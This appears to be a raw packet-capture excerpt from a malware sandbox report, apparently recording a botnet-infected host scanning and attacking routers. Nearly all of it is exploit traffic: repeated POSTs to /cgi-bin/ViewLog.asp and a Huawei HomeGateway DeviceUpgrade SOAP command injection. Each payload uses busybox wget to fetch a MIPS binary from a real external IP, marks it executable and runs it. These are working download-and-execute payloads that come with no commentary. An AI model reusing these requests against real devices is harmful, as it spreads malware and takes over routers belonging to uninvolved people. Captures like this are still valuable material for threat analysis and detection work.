                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>Apache Tomcat/7.0.59 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.59</h3></body></html>
                                              Nov 23, 2023 05:15:56.800144911 CET1227INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 989
                                              Date: Thu, 23 Nov 2023 04:12:46 GMT
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>Apache Tomcat/7.0.59 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.59</h3></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              144192.168.2.144248031.136.1.618080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:39.526163101 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:40.103559017 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:41.255603075 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:43.623387098 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:48.231203079 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:57.446851015 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:17.669954062 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:54.532403946 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              145192.168.2.145967085.240.82.1398080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:39.536526918 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              146192.168.2.1438754156.226.14.11937215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:39.627688885 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:41.287466049 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:43.239388943 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
